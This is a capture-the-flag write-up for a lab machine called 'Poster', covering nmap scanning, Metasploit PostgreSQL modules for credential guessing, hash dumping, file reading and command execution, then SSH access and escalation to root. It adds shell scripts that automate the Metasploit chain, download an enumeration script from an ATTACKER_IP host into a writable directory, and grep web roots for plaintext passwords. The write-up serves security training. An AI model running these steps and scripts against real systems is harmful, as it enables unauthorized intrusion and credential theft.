Poster
Reconnaissance
Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn) so nmap skips host discovery and probes the ports even if the target does not answer pings.
Detailed Nmap Scan:
Command Breakdown:
(-sV): Service and version detection on the open ports
(-sC): Run the default set of NSE scripts
(-p): Only scan ports 22, 80 and 5432 (the ports found open above)
(-oN nmap): Save normal-format output to a file called nmap
Enumeration
The room tells us to go to Metasploit and look for an auxiliary module that enumerates user credentials for the service on 5432 (PostgreSQL's default port), so let's do that.
Let's start Metasploit.
Now let's search for the module.
It's the 4th result, so let's select it and set the options (RHOSTS must point at the target).
Let's now run the enumeration module.
We have a valid username and password.
That answers the next two questions.
Next we need the module that lets us run queries against the database with the credentials we just found.
It is number 6, so let's select it and set the options (the target plus the username and password from the previous step).
Let's run it.
The output includes the database version, so we can answer the next two questions.
Next we need the module that dumps the database user hashes.
This time it is number 8, so let's select it and set the options.
Let's run it.
We get 6 usernames with their password hashes. We can answer the next two questions.
Next we need the module that lets an authenticated database user read arbitrary files from the server.
This time it is number 5, so let's select it, set the options and run it.
Now we look for the module that gives arbitrary command execution on the host through the database.
It is number 2, so let's select it and set the options; we can also answer the next two questions.
Let's run it.
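The chain above is driven interactively in msfconsole, one module at a time. As an added example (not code from the write-up or from the room), the script below writes the same chain into a Metasploit resource script so it can be replayed non-interactively against another target. Assumptions: the write-up identifies the modules only by their position in the search results, so the standard PostgreSQL module names used here (postgres_login, postgres_sql, postgres_hashdump, postgres_readfile) are my mapping of its descriptions; the target address, credentials and file path are placeholders. The command-execution module is left out because it needs a payload and a listener and is better run interactively.

```shell
#!/usr/bin/env bash
# Added example (not from the write-up): replay the PostgreSQL enumeration chain
# as a Metasploit resource script instead of typing it into msfconsole by hand.
# Assumption: the modules the write-up picks by search-result number are the
# standard ones named below. Target, credentials and RFILE are placeholders.
set -eu

# Print the msfconsole commands for the chain.
# Args: target, username, password, [file to read, default /etc/passwd]
postgres_enum_rc() {
    local target="$1" user="$2" pass="$3" rfile="${4:-/etc/passwd}"
    cat <<EOF
# 1. Enumerate valid credentials (the module ships default user/password lists)
use auxiliary/scanner/postgres/postgres_login
set RHOSTS ${target}
run
# 2. Run a query as the recovered user; version() answers the "which version" question
use auxiliary/admin/postgres/postgres_sql
set RHOSTS ${target}
set USERNAME ${user}
set PASSWORD ${pass}
set SQL select version()
run
# 3. Dump usernames and password hashes
use auxiliary/scanner/postgres/postgres_hashdump
set RHOSTS ${target}
set USERNAME ${user}
set PASSWORD ${pass}
run
# 4. Read a file from the database server as the authenticated user
use auxiliary/admin/postgres/postgres_readfile
set RHOSTS ${target}
set USERNAME ${user}
set PASSWORD ${pass}
set RFILE ${rfile}
run
exit
EOF
}

# Write the script to a temp file and run it quietly, if msfconsole is installed.
run_enum() {
    local rc
    rc="$(mktemp)"
    postgres_enum_rc "$@" > "$rc"
    if command -v msfconsole >/dev/null 2>&1; then
        msfconsole -q -r "$rc"
    else
        echo "msfconsole not found; resource script left at $rc" >&2
        return 1
    fi
}

# Usage: run_enum 10.10.10.10 <username> <password> [/path/to/file]
```

Each step reuses the credentials recovered by the login scanner, which is exactly the dependency the write-up walks through by hand; if the first module finds nothing, the later ones fail at authentication and the script should be stopped there.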
The database usernames we dumped may also be local accounts, so from the shell we can cd into one of those users' home directories and list the files.
This file looks interesting, so let's read it.
It contains a password, so let's SSH into the machine with it.
Privilege Escalation
We cannot read the user flag and this user has no sudo rights, so let's run LinEnum.sh on the machine to look for interesting files. First we start an HTTP server on the attacking machine and download the script onto the victim.
You can stabilize the shell with this command
Now let's download the file. Make sure you are in /tmp first, since the low-privileged shell cannot write to most other directories.
Let's make the script executable.
Now let's run it.
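The note about /tmp generalises: pick a directory the current user can actually create files in, and check whether that filesystem is mounted noexec (in which case chmod +x does nothing useful and the script has to be started as bash LinEnum.sh). This is an added example, not code from the write-up; the attacker URL is a placeholder and the candidate directory list is an assumption.

```shell
#!/usr/bin/env bash
# Added example (not from the write-up): choose a drop directory the current user
# can really write to, detect noexec mounts, and fetch a script into it.
# Assumptions: the candidate directory list and the attacker URL are placeholders.
set -eu

# First directory where we can actually create a file. "[ -w ]" only checks
# permission bits and still says yes on a read-only mount, so we test by writing.
pick_writable_dir() {
    local d f
    for d in "${1:-/tmp}" /dev/shm /var/tmp "${HOME:-/nonexistent}"; do
        [ -d "$d" ] || continue
        f="$d/.probe.$$"
        if ( : > "$f" ) 2>/dev/null; then
            rm -f "$f"
            printf '%s\n' "$d"
            return 0
        fi
    done
    return 1
}

# Is the filesystem holding $1 mounted noexec? Uses the longest matching mount
# point in /proc/mounts. On noexec, chmod +x is pointless: run "bash script.sh".
mount_is_noexec() {
    local dir="$1" dev mnt fstype opts rest best="" bestopts=""
    [ -r /proc/mounts ] || return 1
    while read -r dev mnt fstype opts rest; do
        case "$dir/" in
            "${mnt%/}/"*)
                if [ "${#mnt}" -ge "${#best}" ]; then
                    best="$mnt"; bestopts="$opts"
                fi ;;
        esac
    done < /proc/mounts
    case ",$bestopts," in *,noexec,*) return 0 ;; esac
    return 1
}

# Download $1 into directory $2 with whatever client the target has, mark it
# executable and print the command to start it.
fetch_tool() {
    local url="$1" dir="$2" out
    out="$dir/$(basename "$url")"
    if command -v wget >/dev/null 2>&1; then
        wget -q "$url" -O "$out"
    elif command -v curl >/dev/null 2>&1; then
        curl -fsSL "$url" -o "$out"
    else
        echo "neither wget nor curl on target" >&2
        return 1
    fi
    chmod +x "$out" 2>/dev/null || true
    if mount_is_noexec "$dir"; then
        printf 'bash %s\n' "$out"
    else
        printf '%s\n' "$out"
    fi
}

# Usage (ATTACKER_IP is a placeholder; serve the file with "python3 -m http.server 80"):
#   dir="$(pick_writable_dir)" && fetch_tool "http://ATTACKER_IP/LinEnum.sh" "$dir"
```

The write test matters because a directory can look writable by its mode bits and still reject the download; the noexec check matters because hardened hosts often mount /tmp and /dev/shm that way, and the symptom (a "Permission denied" on a file you just chmod'ed) is easy to misread.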
Long story short, neither LinEnum nor Linpeas turned up anything useful (I may just not have been looking at the right thing). Then I remembered the nmap scan showed a web server on port 80, so I went to /var/www/html to look for clues, since web applications often keep database credentials in plaintext config files inside the web root, and found this interesting file.
Let's read it.
We have the password for the user Alison, so let's switch to that user with su.
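Finding that file by hand works on one box. As an added example (not code from the write-up), the script below does the same search systematically: it greps a web root for credential-looking assignments while discarding commented-out lines and empty placeholder values, which is where most false positives come from. The key names, file-type list and the demo web root are constructed for this example.

```shell
#!/usr/bin/env bash
# Added example (not from the write-up): search a web root for plaintext
# credentials in config files, skipping commented-out lines and empty values.
# The key names, file types and the demo web root are constructed assumptions.
set -eu

# Print "file:line:content" for credential-looking assignments under $1.
find_creds() {
    local root="$1"
    # key name, optional suffix/quote, then an assignment or separator (=, =>, :, ,)
    local key="(password|passwd|pwd|secret|db_pass|api_?key|token)[a-z0-9_]*[\"']?[[:space:]]*(=>?|:|,)"
    # commented-out lines: content (after file:line:) starts with #, //, ;, * or /*
    local comment='^[^:]*:[0-9]+:[[:space:]]*(#|//|;|\*|/\*)'
    # assignments with an empty value: key = "" , key = '' or nothing at all
    local empty="(=>?|:|,)[[:space:]]*(\"\"|''|$)"
    grep -rIinE --exclude-dir=.git \
        --include='*.php' --include='*.ini' --include='*.env' --include='.env' \
        --include='*.conf' --include='*.cfg' --include='*.yml' --include='*.yaml' \
        --include='*.json' --include='*.txt' \
        "$key" "$root" 2>/dev/null \
      | grep -vE "$comment" \
      | grep -vE "$empty" || true
}

# Build a small fake web root (constructed data) to exercise the filters.
setup_demo_webroot() {
    local root
    root="$(mktemp -d)"
    mkdir -p "$root/includes" "$root/assets"
    cat > "$root/includes/config.php" <<'EOF'
<?php
// $db_password = "OldCommentedOut";
$db_host = "localhost";
$db_user = "alison";
$db_password = "Th1sIsAC0nstructedP4ss";
define('DB_PASS', '');
EOF
    cat > "$root/.env" <<'EOF'
APP_ENV=production
DB_PASSWORD=
MAIL_SECRET=constructed-mail-secret
EOF
    printf 'body { color: red; } /* password of the site? no */\n' > "$root/assets/style.css"
    printf '%s\n' "$root"
}

# Usage on a real host: find_creds /var/www/html
```

On the demo root this reports only the live PHP password and the .env secret; the commented-out old password, the empty define() and the blank DB_PASSWORD are dropped. Run it as the web-server or low-privileged user you already have, since config files under the web root are usually readable by that account even when the rest of the filesystem is not.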
This user has sudo permissions, so let's list what we are allowed to run.
It looks like we can run all commands as root, so let's switch to root.
We can now read both the user flag and the root flag.